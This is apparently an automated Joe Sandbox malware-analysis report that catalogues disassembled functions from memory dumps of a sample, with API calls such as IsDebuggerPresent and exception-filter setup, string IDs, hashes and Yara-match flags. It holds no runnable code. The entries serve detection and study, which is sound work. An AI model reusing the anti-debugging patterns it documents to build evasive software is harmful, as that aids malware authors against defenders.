                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: "h_$+W{g$7;m4$hPf{$z.>s$l|
                                            • API String ID: 0-1895008752
                                            • Opcode ID: 8f09d10762f8eed375a5601fbd5b0040c91dc01774f279d9cb263e75dc987c63
                                            • Instruction ID: 4ad1dc9e2a905cc0b66a5f5e7205a2e4c66249be6fb9cf4453f38982f7e74ca1
                                            • Opcode Fuzzy Hash: 8f09d10762f8eed375a5601fbd5b0040c91dc01774f279d9cb263e75dc987c63
                                            • Instruction Fuzzy Hash: D9B218F360C2049FE304AE2DEC8567ABBE5EF94720F1A493DE6C4C7744E63598058697
                                            Function 0099525A Relevance: 7.9, Strings: 5, Instructions: 1621COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ;WE$C|q$Jg?w$P2W$f1[o
                                            • API String ID: 0-1059713756
                                            • Opcode ID: 4e72e0757a83aefec46ec441c01babc3dcf9532a41ee7bbec5ee2f9fc32e89cd
                                            • Instruction ID: 8eb06b91de9ffa0a379d0b35133c44369f95193ca20ddadbdc40934dc4d3dcf6
                                            • Opcode Fuzzy Hash: 4e72e0757a83aefec46ec441c01babc3dcf9532a41ee7bbec5ee2f9fc32e89cd
                                            • Instruction Fuzzy Hash: 75B2F7F360C204AFE3046E2DEC8567ABBE5EF94720F16893DE6C4C7744EA3598418697
                                            Function 0040CDA3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,(@), ref: 0040CE9B
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,(@), ref: 0040CEA5
                                            • UnhandledExceptionFilter.KERNEL32(004024E3,?,?,?,?,?,(@), ref: 0040CEB2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID: (@
                                            • API String ID: 3906539128-3675327911
                                            • Opcode ID: 699cb89c4481d733bc24bc723ff59a4702c04dd7a22af15121b47e74e86c8d00
                                            • Instruction ID: 588a31918c4d7a6a9ba75f52031696ab4f5dbddd8307c033202189b188a5c7dc
                                            • Opcode Fuzzy Hash: 699cb89c4481d733bc24bc723ff59a4702c04dd7a22af15121b47e74e86c8d00
                                            • Instruction Fuzzy Hash: 5E31C475911228ABCB21DF65D8897CDBBB4AF08310F5081EAE40CA7291E7749F858F48
                                            Function 00991C13 Relevance: 6.7, Strings: 4, Instructions: 1679COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Bu$U+7{$Uls^$nuyO
                                            • API String ID: 0-2625490385
                                            • Opcode ID: 8652ed218e7de11266833a7aa602c0047aa951ccaa5fe62d0ea9df3e84df7d91
                                            • Instruction ID: 063e1ae811f370509b0c091f1c124a25b0e58945f2e9f21ff85effb73d0c9979
                                            • Opcode Fuzzy Hash: 8652ed218e7de11266833a7aa602c0047aa951ccaa5fe62d0ea9df3e84df7d91
                                            • Instruction Fuzzy Hash: 91B229F3A082149FE304AE2DEC8567AF7E5EF94620F1A893DEAC4C3744E93558458793
                                            Function 0098E623 Relevance: 6.6, Strings: 4, Instructions: 1636COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: >s;n$Jn;}$RKMg$LOw
                                            • API String ID: 0-3076901036
                                            • Opcode ID: b76d300e3d28bd811791d73551008d1225e5a17fdcf55b75da4131e687e79558
                                            • Instruction ID: 4fbf349a6b9c30e79fece1c9f87790c5082d774b093af904420d10e4e97b1a0a
                                            • Opcode Fuzzy Hash: b76d300e3d28bd811791d73551008d1225e5a17fdcf55b75da4131e687e79558
                                            • Instruction Fuzzy Hash: 7FB237F36086049FE304AE2DEC8577ABBE9EF94320F1A463DE6C5C3744E63598058697
                                            Function 009895CA Relevance: 6.6, Strings: 4, Instructions: 1613COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ;Cv$<L7$zL}$%!{
                                            • API String ID: 0-1584933136
                                            • Opcode ID: 0ec80e946418ca1eda4853e918eb4b6f81bcbddd19390cb01693c2e61493beff
                                            • Instruction ID: 72a91dd953426b89fc9abd93e2b06e9d7ee1181bacb487d1700472a5ca036207
                                            • Opcode Fuzzy Hash: 0ec80e946418ca1eda4853e918eb4b6f81bcbddd19390cb01693c2e61493beff
                                            • Instruction Fuzzy Hash: FBB205F350C204AFE3047E69EC8567ABBE9EF94720F1A492DEAC4C7744E63598018797
                                            Function 009937EB Relevance: 6.6, Strings: 4, Instructions: 1566COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 7Ti$<!fB$QM~k$Yqf
                                            • API String ID: 0-3252589865
                                            • Opcode ID: 4417687318d7b2f12d392cab16b27a8d60786439bf257298cf57dec796e0b513
                                            • Instruction ID: bd0428b7ff1f3113706858d5d5ce68dc45b0ec76d0f338464580a8ef204a5106
                                            • Opcode Fuzzy Hash: 4417687318d7b2f12d392cab16b27a8d60786439bf257298cf57dec796e0b513
                                            • Instruction Fuzzy Hash: F4B2F6F3A0C2009FE704AF29EC8567AFBE9EF94720F16893DE6C583744E63558058697
                                            Function 04B40B67 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction ID: 9151a3e1b18bc91cd7565aa796d2b3fd9c13901fbfc1f0d7d8c86227081eae00
                                            • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction Fuzzy Hash: B4024F71E012199FDF14DFA8C880AADFBB1FF88314F2485A9D919E7340D731AA45DB90
                                            Function 04CFFD00 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction ID: 43bc36f6878c89f3ffc6a2c396747c0521daf02947ea4f8256dba7dc923fb648
                                            • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction Fuzzy Hash: 7F022C71E00219ABDF15CFA9D8807AEBBF1FF49314F14826AD519EB381D735AA418B90
                                            Function 00410900 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction ID: 1698085c936ca5c6c6a57ee88efec3ce2b030c017204745a192f91a5fd5d0df0
                                            • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction Fuzzy Hash: 8A025C71E002199BDF14CFA9D9806EEBBF1FF48314F24826AE919E7341D775A9818B84
                                            Function 04B3A7B1 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                            Download Yara Rule
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(00000017,12041A13), ref: 04B3A7BD
                                            • IsDebuggerPresent.KERNEL32 ref: 04B3A889
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B3A8A9
                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 04B3A8B3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                            • String ID:
                                            • API String ID: 254469556-0
                                            • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction ID: 37b6013e9a577dd1b1e392eabc504ea67d8bfb2c338f5351aa0f62ce0e257004
                                            • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction Fuzzy Hash: 0E312775D05218DBDB10DFA5D989BCCBBB8FF08305F1041EAE44DAB250EB71AA898F45
                                            Function 0040A54A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                            Download Yara Rule
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(00000017,12041A13), ref: 0040A556
                                            • IsDebuggerPresent.KERNEL32 ref: 0040A622
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A642
                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A64C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                            • String ID:
                                            • API String ID: 254469556-0
                                            • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction ID: 8b01d550a0a2fff4667565f177a0bd7aa15c2cc699040a0714bae659939ad5a8
                                            • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction Fuzzy Hash: 40311A75D0531CDBDB10DFA5D9897CDBBB8BF08304F1080AAE409A7290EB759A858F49
                                            Function 10002FDA Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
                                            • IsDebuggerPresent.KERNEL32 ref: 100030B2
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                            • String ID:
                                            • API String ID: 254469556-0
                                            • Opcode ID: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                            • Instruction ID: 336d1356b37294b5c1fe5cc3e7a5e53ac0bdfc53d52c9a9f50db52ddd632742b
                                            • Opcode Fuzzy Hash: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                            • Instruction Fuzzy Hash: B6312B75D45269DBEB21DF64C989BCDBBF8EF08340F1081AAE40DA7250EB719A85CF04
                                            Function 04CF22C0 Relevance: 5.5, Strings: 4, Instructions: 454COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0.@$P.@$p.@$p.@P.@0.@
                                            • API String ID: 0-3587633984
                                            • Opcode ID: b422344de76828a5e8cbae21da2638b275dc5e39bbf3ab9b9d7bd40fd995c566
                                            • Instruction ID: edba82406a6c8f71feb90599b62297755b71d0b6b78ea1f0b6545c1508d6edd9
                                            • Opcode Fuzzy Hash: b422344de76828a5e8cbae21da2638b275dc5e39bbf3ab9b9d7bd40fd995c566
                                            • Instruction Fuzzy Hash: 72F1D271B00205ABDB50CF68DC81BA9B7B6FF48304F1441A9EA09EB281D77AF914CB95
                                            Function 04B3D00A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04B32A70), ref: 04B3D102
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04B32A70), ref: 04B3D10C
                                            • UnhandledExceptionFilter.KERNEL32(04B3274A,?,?,?,?,?,04B32A70), ref: 04B3D119
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID:
                                            • API String ID: 3906539128-0
                                            • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                            • Instruction ID: b8f538d7019062d84086c9f53a6f5d1d5fbf664f357c8289c6a0af6c8bf45c71
                                            • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                            • Instruction Fuzzy Hash: 62319274911228ABCB61DF65D8887CDBBB8FF18315F5041EAE41CA7250E770AF858F45
                                            Function 100056A0 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID:
                                            • API String ID: 3906539128-0
                                            • Opcode ID: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                            • Instruction ID: 5682311db8f2ea5b7fb0b10b77ab1de1cec722dcfd082a676ba882e0b3775376
                                            • Opcode Fuzzy Hash: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                            • Instruction Fuzzy Hash: 4B31D3749012299BDB62DF24DD89B8DBBB8EF08750F5081EAE41CA7250EB709F858F44
                                            Function 10005F25 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                            • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                            • ExitProcess.KERNEL32 ref: 10005F60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                            • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                            • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                            • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                            Function 04B3092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: .$GetProcAddress.$l
                                            • API String ID: 0-2784972518
                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction ID: 78b6e937622b060b84808a2b2c494efa2fcaad73efecce16e50acb24cef678e3
                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction Fuzzy Hash: E6316DB6900609DFDB10DF99C880AADBBF5FF48329F14418AD941A7314D771FA45CBA4
                                            Function 004107E2 Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,CA335CE0), ref: 004107F7
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID:
                                            • API String ID: 1518329722-0
                                            • Opcode ID: 5c7dfd05e128c4447f34c82fa0a83ef235602569a1e055a837d6a0b3eab8545e
                                            • Instruction ID: 9ffaf8f16d1feaf21b4895ba9d91ffe558ea63f081936d9fadb7ea4d2284f30e
                                            • Opcode Fuzzy Hash: 5c7dfd05e128c4447f34c82fa0a83ef235602569a1e055a837d6a0b3eab8545e
                                            • Instruction Fuzzy Hash: C2F0F4B5A002147F8724EF6EC8049DFBEE9EBC5370725826AE809D3340D9B4DD82C2D4
                                            Function 04D09706 Relevance: 3.0, APIs: 1, Instructions: 1473COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: __floor_pentium4
                                            • String ID:
                                            • API String ID: 4168288129-0
                                            • Opcode ID: 33b49f04a218de2c7083f10be8a0aa68633273c3dfcf1cc45880ee3ed5084c1c
                                            • Instruction ID: 73816b41df38fbaa784d2d7fa09879827f854d7fca52ec6a5b54ede456d92f48
                                            • Opcode Fuzzy Hash: 33b49f04a218de2c7083f10be8a0aa68633273c3dfcf1cc45880ee3ed5084c1c
                                            • Instruction Fuzzy Hash: 56D227B1E082298FDB65CE28DD407EAB7B5FB55304F1481EAD44DE7281E778AE818F41
                                            Function 0040EEC9 Relevance: 2.8, Strings: 2, Instructions: 333COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0Z@$Z@
                                            • API String ID: 0-605451032
                                            • Opcode ID: a43c74f0a017d1f7b27258233af7b0f8bd5ab01d46b0208e3573d12e86ff0486
                                            • Instruction ID: c2704d3dc0eafd102a63da391050ffa25cdd35e93d0e938198e091b07b9d6d51
                                            • Opcode Fuzzy Hash: a43c74f0a017d1f7b27258233af7b0f8bd5ab01d46b0208e3573d12e86ff0486
                                            • Instruction Fuzzy Hash: 7AC1DE709006079ECB34CE69C584A7BBBB1AB45304F184A3FD452BBBD2C339AC59CB59
                                            Function 0040EB87 Relevance: 2.8, Strings: 2, Instructions: 318COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0$H@
                                            • API String ID: 0-2786613154
                                            • Opcode ID: ca813c29726484238c91fef20f317be1219e422960450490370ba48bfc0cd99d
                                            • Instruction ID: 4a3fd9315a5abbba8fc5c956050257a45ee5a7b78c0dcd4935651e2db0378757
                                            • Opcode Fuzzy Hash: ca813c29726484238c91fef20f317be1219e422960450490370ba48bfc0cd99d
                                            • Instruction Fuzzy Hash: 9CB1E57090460B8BDB24CE6AC555ABFB7A1AF05304F140E3FD592B77C1C739A926CB89
                                            Function 00920BE1 Relevance: 2.7, Strings: 2, Instructions: 239COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: [vwW$[vwW
                                            • API String ID: 0-2838870811
                                            • Opcode ID: a043ba4a7c1c5f008a3834bd2f438115e1d7965db0297a4a8def545e9bc69a82
                                            • Instruction ID: d694340da5bdaa89050273ff4eb72be021a5eeddd23e966797f3c90f57de5bfe
                                            • Opcode Fuzzy Hash: a043ba4a7c1c5f008a3834bd2f438115e1d7965db0297a4a8def545e9bc69a82
                                            • Instruction Fuzzy Hash: 3A8107B3A086109FE708AE29DC4477EF7E5EFD4720F168A3DDAD893784DA3448418683
                                            Function 0083FB10 Relevance: 2.7, Strings: 2, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: J _$Zzwn
                                            • API String ID: 0-1042504971
                                            • Opcode ID: 4b954f147fae81018a55ee6c69d3a89867899c3c42618b021893411cee9541c8
                                            • Instruction ID: 98d208ce924358f9b9f8ec810160b15c3e23779a72b8a4b4b9c3261d1dc786a9
                                            • Opcode Fuzzy Hash: 4b954f147fae81018a55ee6c69d3a89867899c3c42618b021893411cee9541c8
                                            • Instruction Fuzzy Hash: E05168F3E182045BF3106D3DEC85366B6D79BD4720F6B823C9A8897388ED795D068286
                                            Function 1000E184 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                            • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                            • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                            • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                            Function 04B45955 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04B45950,?,?,00000008,?,?,04B4C8B1,00000000), ref: 04B45B82
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction ID: e6ae9f4186ffcf231c09e7090596a75d4bcb569eac7cbe9f7cff4074e99552ea
                                            • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction Fuzzy Hash: 3CB12E31610A08EFD725CF28C486B657BE0FF85365F258698E9D9CF2A1D335E982DB40
                                            Function 004156EE Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004156E9,?,?,00000008,?,?,0041C64A,00000000), ref: 0041591B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
